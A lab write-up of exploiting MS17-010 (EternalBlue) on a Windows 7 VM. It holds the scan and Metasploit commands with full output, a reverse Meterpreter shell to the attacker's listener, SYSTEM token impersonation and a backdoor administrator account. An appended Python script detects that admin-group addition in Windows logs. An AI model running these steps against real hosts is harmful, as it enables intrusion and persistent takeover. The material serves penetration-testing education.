Reproducing and Exploiting the MS17-010 Vulnerability

1 Lab setup

Win7 VM: 192.168.225.139

cn_windows_7_ultimate_x64_dvd_x15-66043.iso

Kali 2020.4: 192.168.225.138

kali-linux-2020.4-vmware-amd64.7z

If you cannot connect to the Kali host over SSH, run sudo /etc/init.d/ssh start and enter the kali password.

2 Attack procedure

1. Make sure the network is reachable: Kali must be able to ping the Win7 host, and the Win7 firewall is turned off. The default Kali password is kali.

sudo su -
ping 192.168.225.139
┌──(kali㉿kali)-[~]
└─$ sudo su -

[sudo] password for kali:

┌──(root💀kali)-[~]
└─# ping 192.168.225.139
PING 192.168.225.139 (192.168.225.139) 56(84) bytes of data.
64 bytes from 192.168.225.139: icmp_seq=1 ttl=128 time=0.647 ms
64 bytes from 192.168.225.139: icmp_seq=2 ttl=128 time=0.646 ms

2. Scan ports 139 and 445

nmap -p 139,445 -Pn 192.168.225.139
┌──(root💀kali)-[~]
└─# nmap -p 139,445 -Pn 192.168.225.139
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-12-13 08:57 EST
Nmap scan report for 192.168.225.139
Host is up (0.0011s latency).

PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 00:0C:29:35:B1:CF (VMware)

Nmap done: 1 IP address (1 host up) scanned in 11.47 seconds

3. Switch to Kali and run msfconsole to enter the attack environment

┌──(kali㉿kali)-[~]
└─$ msfconsole

4. Search for the EternalBlue (MS17-010) exploit modules and pick one to use

msf6 > search ms17-010
msf6 > search ms17-010

Matching Modules
================

   #  Name                                           Disclosure Date  Rank     Check  Description
   -  ----                                           ---------------  ----     -----  -----------
   0  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   1  auxiliary/scanner/smb/smb_ms17_010                              normal   No     MS17-010 SMB RCE Detection
   2  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   3  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   4  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   5  exploit/windows/smb/smb_doublepulsar_rce       2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution


Interact with a module by name or index. For example info 5, use 5 or use exploit/windows/smb/smb_doublepulsar_rce

5. View the module's details and supported targets (using the index number is recommended)

msf6 > info 2
msf6 > info 2

       Name: MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
     Module: exploit/windows/smb/ms17_010_eternalblue
   Platform: Windows
       Arch:
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Average
  Disclosed: 2017-03-14

Provided by:
  Sean Dillon <sean.dillon@risksense.com>
  Dylan Davis <dylan.davis@risksense.com>
  Equation Group
  Shadow Brokers
  thelightcosine

Available targets:
  Id  Name
  --  ----
  0   Windows 7 and Server 2008 R2 (x64) All Service Packs

Check supported:
  Yes

Basic options:
  Name           Current Setting  Required  Description
  ----           ---------------  --------  -----------
  RHOSTS                          yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT          445              yes       The target port (TCP)
  SMBDomain      .                no        (Optional) The Windows domain to use for authentication
  SMBPass                         no        (Optional) The password for the specified username
  SMBUser                         no        (Optional) The username to authenticate as
  VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
  VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.

Payload information:
  Space: 2000

Description:
  This module is a port of the Equation Group ETERNALBLUE exploit,
  part of the FuzzBunch toolkit released by Shadow Brokers. There is a
  buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size is
  calculated in Srv!SrvOs2FeaListSizeToNt, with mathematical error
  where a DWORD is subtracted into a WORD. The kernel pool is groomed
  so that overflow is well laid-out to overwrite an SMBv1 buffer.
  Actual RIP hijack is later completed in
  srvnet!SrvNetWskReceiveComplete. This exploit, like the original may
  not trigger 100% of the time, and should be run continuously until
  triggered. It seems like the pool will get hot streaks and need a
  cool down period before the shells rain in again. The module will
  attempt to use Anonymous login, by default, to authenticate to
  perform the exploit. If the user supplies credentials in the
  SMBUser, SMBPass, and SMBDomain options it will use those instead.
  On some systems, this module may cause system instability and
  crashes, such as a BSOD or a reboot. This may be more likely with
  some payloads.

References:
  https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/MS17-010
  https://cvedetails.com/cve/CVE-2017-0143/
  https://cvedetails.com/cve/CVE-2017-0144/
  https://cvedetails.com/cve/CVE-2017-0145/
  https://cvedetails.com/cve/CVE-2017-0146/
  https://cvedetails.com/cve/CVE-2017-0147/
  https://cvedetails.com/cve/CVE-2017-0148/
  https://github.com/RiskSense-Ops/MS17-010

Also known as:
  ETERNALBLUE

6. Select the exploit module

msf6 > use 2

msf6 > use 2
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) >

7. Set the target host IP

set rhosts 192.168.225.139
options

msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.225.139
rhosts => 192.168.225.139
msf6 exploit(windows/smb/ms17_010_eternalblue) > options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS         192.168.225.139  yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT          445              yes       The target port (TCP)
   SMBDomain      .                no        (Optional) The Windows domain to use for authentication
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.225.138  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs


msf6 exploit(windows/smb/ms17_010_eternalblue) >

8. Confirm the host is vulnerable and run the exploit

msf6 exploit(windows/smb/ms17_010_eternalblue) > run

## The following output is what a successful run looks like
[*] Meterpreter session 1 opened (10.0.0.129:4444 -> 10.0.0.128:49182 ) at 2022-12-13 20:49:47 +0800
[+] 10.0.0.128:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.0.0.128:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.0.0.128:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

msf6 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 192.168.225.138:4444
[*] 192.168.225.139:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.225.139:445   - Host is likely VULNERABLE to MS17-010! - Windows 7 Home Basic 7600 x64 (64-bit)
[*] 192.168.225.139:445   - Scanned 1 of 1 hosts (100% complete)
[*] 192.168.225.139:445 - Connecting to target for exploitation.
[+] 192.168.225.139:445 - Connection established for exploitation.
[+] 192.168.225.139:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.225.139:445 - CORE raw buffer dump (25 bytes)
[*] 192.168.225.139:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 48 6f 6d 65 20 42  Windows 7 Home B
[*] 192.168.225.139:445 - 0x00000010  61 73 69 63 20 37 36 30 30                       asic 7600
[+] 192.168.225.139:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.225.139:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.225.139:445 - Sending all but last fragment of exploit packet
[*] 192.168.225.139:445 - Starting non-paged pool grooming
[+] 192.168.225.139:445 - Sending SMBv2 buffers
[+] 192.168.225.139:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.225.139:445 - Sending final SMBv2 buffers.
[*] 192.168.225.139:445 - Sending last fragment of exploit packet!
[*] 192.168.225.139:445 - Receiving response from exploit packet
[+] 192.168.225.139:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.225.139:445 - Sending egg to corrupted connection.
[*] 192.168.225.139:445 - Triggering free of corrupted buffer.
[*] Sending stage (200262 bytes) to 192.168.225.139
[*] Meterpreter session 1 opened (192.168.225.138:4444 -> 192.168.225.139:49179) at 2022-12-13 09:11:35 -0500
[+] 192.168.225.139:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.225.139:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.225.139:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter >

9. Open a command shell (DOS prompt) on the target

meterpreter > shell
C:\Windows\system32> ipconfig
C:\Windows\system32> exit

meterpreter > shell
Process 2768 created.
Channel 1 created.
Microsoft Windows [版本 6.1.7600]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。

C:\Windows\system32>ipconfig
ipconfig

Windows IP 配置


以太网适配器 Bluetooth 网络连接:

   媒体状态  . . . . . . . . . . . . : 媒体已断开
   连接特定的 DNS 后缀 . . . . . . . :

以太网适配器 本地连接:

   连接特定的 DNS 后缀 . . . . . . . : localdomain
   本地链接 IPv6 地址. . . . . . . . : fe80::7575:602f:dade:693c%11
   IPv4 地址 . . . . . . . . . . . . : 192.168.225.139
   子网掩码  . . . . . . . . . . . . : 255.255.255.0
   默认网关. . . . . . . . . . . . . : 192.168.225.2

隧道适配器 isatap.localdomain:

   媒体状态  . . . . . . . . . . . . : 媒体已断开
   连接特定的 DNS 后缀 . . . . . . . : localdomain

10. Escalate privileges

meterpreter > use incognito
Loading extension incognito...Success.

meterpreter > list_tokens -u

meterpreter > impersonate_token "NT AUTHORITY\SYSTEM"
[+] Delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM

C:\Windows\system32>exit
exit
meterpreter > use incognito
Loading extension incognito...Success.
meterpreter > list_tokens -u

Delegation Tokens Available
========================================
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
WIN-TH6PABRUV1T\snow

Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON

meterpreter > impersonate_token "NT AUTHORITY\SYSTEM"
[+] Delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM
meterpreter >

11. Add an account and add it to the Administrators group

net user test 123 /add

net localgroup administrators test /add

meterpreter > shell
Process 2864 created.
Channel 2 created.
Microsoft Windows [版本 6.1.7600]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。

C:\Windows\system32>net user test 123 /add
net user test 123 /add
帐户已经存在。

请键入 NET HELPMSG 2224 以获得更多的帮助。


C:\Windows\system32>net localgroup administrators test /add
net localgroup administrators test /add
命令成功完成。


C:\Windows\system32>

12. On the Win7 machine, view the newly added user by typing "netplwiz" in the Run dialog.

13. Exit the target

C:\Windows\system32>exit
exit
meterpreter >
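As an added detection-side example (not part of the original post), here is a Python hunt over constructed Windows Security-log records for the final step of the walkthrough: a member added to the local Administrators group. Event IDs 4720 (user account created) and 4732 (member added to a local group) are the standard Windows events; the sample records, host name and account names are constructed for illustration.

```python
"""Hunt for a local-admin addition in Windows Security events.

Windows logs 4720 when a local account is created and 4732 when a member
is added to a security-enabled local group. A 4732 alone must alert: in
the walkthrough "net user" failed with NET HELPMSG 2224 (account already
exists) and "net localgroup administrators" still succeeded.
"""
import json

# Groups whose membership changes are always worth an alert.
PRIVILEGED_GROUPS = {"administrators"}

# Constructed sample records shaped like Security-log 4624/4720/4732 events
# (one JSON object per line; host and account names are made up).
SAMPLE_LOG = r"""
{"EventID": 4624, "SubjectUserName": "-", "TargetUserName": "ANONYMOUS LOGON", "LogonType": 3}
{"EventID": 4720, "SubjectUserName": "SYSTEM", "SubjectDomainName": "NT AUTHORITY", "TargetUserName": "test"}
{"EventID": 4732, "SubjectUserName": "SYSTEM", "SubjectDomainName": "NT AUTHORITY", "TargetUserName": "Administrators", "MemberName": "WIN-TH6PABRUV1T\\test"}
{"EventID": 4732, "SubjectUserName": "snow", "SubjectDomainName": "WIN-TH6PABRUV1T", "TargetUserName": "Remote Desktop Users", "MemberName": "WIN-TH6PABRUV1T\\helpdesk"}
"""


def parse_events(text):
    """Parse newline-delimited JSON event records, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def detect_admin_additions(events):
    """Return one finding per 4732 that adds a member to a privileged group.

    A preceding 4720 for the same account is recorded as context; its
    absence never suppresses the finding.
    """
    created = set()  # accounts created earlier in this log (4720)
    findings = []
    for ev in events:
        eid = ev.get("EventID")
        if eid == 4720:
            created.add(ev["TargetUserName"].lower())
        elif eid == 4732 and ev["TargetUserName"].lower() in PRIVILEGED_GROUPS:
            member = ev["MemberName"].rsplit("\\", 1)[-1]  # strip HOST\ prefix
            findings.append({
                "member": member,
                "group": ev["TargetUserName"],
                "subject": ev.get("SubjectDomainName", "") + "\\" + ev.get("SubjectUserName", ""),
                "subject_is_system": ev.get("SubjectUserName", "").upper() == "SYSTEM",
                "created_in_same_log": member.lower() in created,
            })
    return findings
```

A finding whose subject is SYSTEM and whose account was not created in the same log is the pattern the walkthrough leaves behind on a host where the account already existed.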
posted @ 2022-12-13 22:36  冰雪2021